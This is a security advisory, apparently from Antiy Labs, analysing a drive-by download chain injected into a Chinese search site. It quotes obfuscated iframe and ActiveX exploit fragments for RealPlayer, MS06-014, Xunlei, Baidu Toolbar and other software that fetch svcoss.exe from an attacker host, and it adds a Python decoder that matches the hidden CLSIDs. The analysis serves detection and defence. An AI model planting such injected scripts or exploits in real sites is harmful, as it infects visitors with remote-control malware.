On December 19, Antiy Labs' anti-virus monitoring network discovered that the search site 搜索网 (http://we.875***.cn/index.htm) had been injected with malicious code by attackers. Any user who visits the site is infected: the system automatically downloads and runs several malicious programs from a malicious website. Infected users may be remotely controlled and have sensitive information stolen.
The following chain of frames was inserted into the site's home page:

Inserted code: <SCRIPT language=JavaScript src="img/css.js"></SCRIPT>
Key code from img/css.js:
document.write('<iframe width=50 height=0 style=display:none src="http://shers.g3****.cn/img/real.gif"></iframe>
<script src="http://shers.g3****.cn/img/xpkk.js"></script>
{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/tok.gif"></iframe>')}
if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/baidu.gif"></iframe>')}
{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/xpbf.gif"></iframe>')}
{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/xplz.gif"></iframe>')}
{if(new ActiveXObject("Pdg2"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/reader.gif"></iframe>')}
{if(new ActiveXObject("e.PowerPlayerCtrl.1"))document.write('<iframe style=display:none src="http://shers.g3****.cn/img/pps.gif"></iframe>')}
(1) Key code of http://shers.g3****.cn/img/real.gif:
Real[\"\\x49\\x6d\\x70\\x6f\\x72\\x74\"](\"c:\\\\Program Files\\\\NetMeeting\\\\TestSnd.wav\",PayLoad,\"\",0,0);
afdsffffasdf=\"flsdajflasdjfl32rewr231ffas\";}
var Then=new Date();
Then.setTime(Then.getTime()+24*60*60*1000);
var cookieString=new String(document.cookie);
var cookieHeader=\"Cookie2=\";
var beginPosition=cookieString.indexOf(cookieHeader);
if(beginPosition==-1){RealExploit();}
Although the code is obfuscated, it can still be identified as exploiting the RealPlayer stack overflow vulnerability (note the path c:\Program Files\NetMeeting\TestSnd.wav). Its purpose is to download the file svcoss.exe.
(2) Key code of http://shers.g3****.cn/img/xpkk.js:
document.writeln("\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/");
document.writeln("\'I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" DMq1 = \".exe\"");
document.writeln(" DMq = \"http:\/\/shers.g3****.cn\/img\/svcoss\"");
document.writeln("\'I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" Set rbDio = document.createElement(\"object\")");
document.writeln("\'I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" ccc=\"clsid:BD96\":lll=\"C556-65\":sss=\"A3-11D\":iii=\"0-983A-00C\":ddd=\"04FC29E36\":uso=\"Microsoft.X\":pk=\"MLHTTp\"");
Key ID: clsid:BD96C556-65A3-11D0-983A-00C04FC29E36, which exploits the MS06-014 vulnerability. Download address: http://shers.g3****.cn/img/svcoss.exe.
(3) Key code of http://shers.g3****.cn/img/tok.gif:
document.writeln("expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);");
document.writeln("var set_cookie = document.cookie.indexOf(\"3Ware=\"); ");
document.writeln("if (set_cookie == -1) {document.cookie = \"3Ware=1;expires=\" + expires.toGMTString();");
document.writeln("document.write(\'<object id=\"gl\" classid=\"clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F\"><\/object>\');");
document.writeln("var helloworld2Address = 0x0c0c0c0c;");
Key ID: clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F, which exploits a Xunlei (Thunder) vulnerability. Its purpose is to download the file svcoss.exe.
(4) Key code of http://shers.g3****.cn/img/baidu.gif:
document.writeln("<SCRIPT>document.writeln(\"<html><head><script>functionLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLoveVC(){VipDMq[\\\"dloadDS\\\"](\\\"http:\/\/shers.g3****.cn\/img\/svcoss.cab\\\",\\\"svcoss.exe\\\",0);}<\\\/script><\\\/head><OBJECT ID=\\\"VipDMq\\\" cLaSsId=\\\"cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9}\\\"><\\\/OBJECT><script>LovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLovemswDMqLoveVC()<\\\/script><\\\/html>\");<\/SCRIPT>");
Key ID: cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9}, which exploits a Baidu Toolbar (百度超级搜霸) vulnerability. Download address: http://shers.g3****.cn/img/svcoss.cab, which delivers the file svcoss.exe.
(5) Key code of http://shers.g3****.cn/img/xpbf.gif:
document.writeln("<SCRIPT>window[\"document\"][\"writeln\"](\"<html>\");window[\"document\"][\"writeln\"](\"<objectClAsSiD=\\\"\\x43\\x6c\\x53\\x69\\x44\\x3a\\x36\\x42\\x45\\x35\\x32\\x45\\x31\\x44\\x2d\\x45\\x35\\x38\\x36\\x2d\\x34\\x37\\x34\\x66\\x2d\\x41\\x36\\x45\\x32\\x2d\\x31\\x41\\x38\\x35\\x41\\x39\\x42\\x34\\x44\\x39\\x46\\x42\\\" id=\\\'ChinaMBs\\\'><\\\/object>\")
This code is encoded; once decoded, its key ID is CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB, which exploits multiple buffer overflow vulnerabilities in the mps.dll component of Storm Player (暴风影音) 2. Its purpose is to download the file svcoss.exe.
(6) Key code of http://shers.g3****.cn/img/xplz.gif:
document.writeln("id=LoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVChenziLoveVC ");
document.writeln("style=\"DISPLAY: none\" ");
document.writeln("classid=clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69><\/OBJECT>")
Key ID: clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69, which exploits a Lianzhong (联众) game lobby vulnerability. Its purpose is to download the file svcoss.exe.
(7) Key code of http://shers.g3****.cn/img/reader.gif:
document.writeln("document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=gb2312\">");");
document.writeln("document.writeln("<SCRIPT>window[\"document\"][\"writeln\"](\"<html>\");window[\"document\"][\"writeln\"](\"<objectClAsSiD=\\\"\\x43\\x6c\\x53\\x69\\x44\\x3a\\x36\\x42\\x45\\x35\\x32\\x45\\x31\\x44\\x2d\\x45\\x35\\x38\\x36\\x2d\\x34\\x37\\x34\\x66\\x2d\\x41\\x36\\x45\\x32\\x2d\\x31\\x41\\x38\\x35\\x41\\x39\\x42\\x34\\x44\\x39\\x46\\x42\\\" id=\\\'ChinaMBs\\\'><\\\/object>\"
This code is encoded; once decoded, its key ID is clsid:{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}, which exploits a SuperStar (超星) Reader vulnerability. Its purpose is to download the file svcoss.exe.
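Two of the obfuscation tricks seen in this chain hide the CLSID that identifies the targeted control: xpkk.js in section (2) splits the CLSID across several short string variables, while xpbf.gif and reader.gif in sections (5) and (7) spell it out as \xNN hex escapes inside nested document.writeln strings. The Python below is an added example, not code from Antiy or from the incident: it peels the JavaScript escape layers, reassembles split string fragments, and matches whatever CLSIDs emerge against the list this report gives. The two samples are constructed copies of the obfuscation styles quoted above (the hex bytes are the sequence shown for xpbf.gif; the split fragments follow the xpkk.js line).

```python
r"""Recover CLSIDs hidden by \xNN escapes (xpbf.gif, reader.gif) and by string
splitting (xpkk.js), then match them against the CLSIDs named in this report.

Added example; not code from the Antiy report. The two samples are constructed
copies of the obfuscation styles shown in the report; the lookup table is the
report's own CLSID-to-exploit mapping.
"""
import re

# CLSIDs the report ties to each exploit page, normalized to upper case, no braces.
KNOWN_BAD_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "MS06-014 (xpkk.js)",
    "F3E70CEA-956E-49CC-B444-73AFE593AD7F": "Xunlei (tok.gif)",
    "A7F05EE4-0426-454F-8013-C41E3596E9E9": "Baidu Toolbar (baidu.gif)",
    "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB": "Storm Player 2 mps.dll (xpbf.gif)",
    "AE93C5DF-A990-11D1-AEBD-5254ABDD2B69": "Lianzhong lobby (xplz.gif)",
    "7F5E27CE-4A5C-11D3-9232-0000B48A05B2": "SuperStar Reader (reader.gif)",
}

HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
CLSID_RE = re.compile(
    r"clsid:\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?", re.IGNORECASE)
JS_SIMPLE_ESCAPES = {'\\"': '"', "\\'": "'", "\\/": "/"}

# Constructed samples in the shape of the captured code.
SAMPLE_HEX_ESCAPED = r"""window["document"]["writeln"]("<object ClAsSiD=\\\"\\x43\\x6c\\x53\\x69\\x44\\x3a\\x36\\x42\\x45\\x35\\x32\\x45\\x31\\x44\\x2d\\x45\\x35\\x38\\x36\\x2d\\x34\\x37\\x34\\x66\\x2d\\x41\\x36\\x45\\x32\\x2d\\x31\\x41\\x38\\x35\\x41\\x39\\x42\\x34\\x44\\x39\\x46\\x42\\\" id=\\\'ChinaMBs\\\'><\\\/object>")"""
SAMPLE_SPLIT_STRINGS = r"""document.writeln(" ccc=\"clsid:BD96\":lll=\"C556-65\":sss=\"A3-11D\":iii=\"0-983A-00C\":ddd=\"04FC29E36\":uso=\"Microsoft.X\":pk=\"MLHTTp\"");"""


def deobfuscate(text, max_rounds=4):
    r"""Peel JS string-escape layers: doubled backslashes, \xNN, \", \' and \/.

    Repeats until a pass changes nothing, so each nested document.writeln layer
    (which re-escapes the layer inside it) is unwrapped in turn.
    """
    for _ in range(max_rounds):
        nxt = text.replace("\\\\", "\\")
        nxt = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), nxt)
        for esc, plain in JS_SIMPLE_ESCAPES.items():
            nxt = nxt.replace(esc, plain)
        if nxt == text:
            break
        text = nxt
    return text


def extract_clsids(text):
    """CLSIDs visible after decoding, including ones split across string literals."""
    decoded = deobfuscate(text)
    pieces = decoded.split('"')
    # Joining every other piece reassembles "ab":x="cd" -> abcd, whichever
    # quote the first fragment happens to start on.
    views = (decoded, "".join(pieces[0::2]), "".join(pieces[1::2]))
    found = {m.group(1).upper() for v in views for m in CLSID_RE.finditer(v)}
    return sorted(found)


def match_indicators(text):
    """(clsid, exploit label) for every recovered CLSID that is in the report's list."""
    return [(c, KNOWN_BAD_CLSIDS[c]) for c in extract_clsids(text) if c in KNOWN_BAD_CLSIDS]


if __name__ == "__main__":
    for sample in (SAMPLE_HEX_ESCAPED, SAMPLE_SPLIT_STRINGS):
        print(match_indicators(sample))
```

The decode step is deliberately dumb: it does not execute the script, only strips the escape forms the report shows, so it is safe to run over captured pages in bulk. Matching on the normalized CLSID rather than on the literal text is what lets the same rule catch ClSiD:6BE5..., cLSiD:{A7F0...} and the fragmented clsid:BD96 + C556-65 + ... forms alike.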
(8) http://shers.g3****.cn/img/pps.gif: the address is no longer reachable.
When a user visits http://we.87****.cn/index.htm, the system automatically downloads the following virus file:
http://shers.g3****.cn/img/svcoss.exe
Virus name: Worm.Win32.PaBug.ep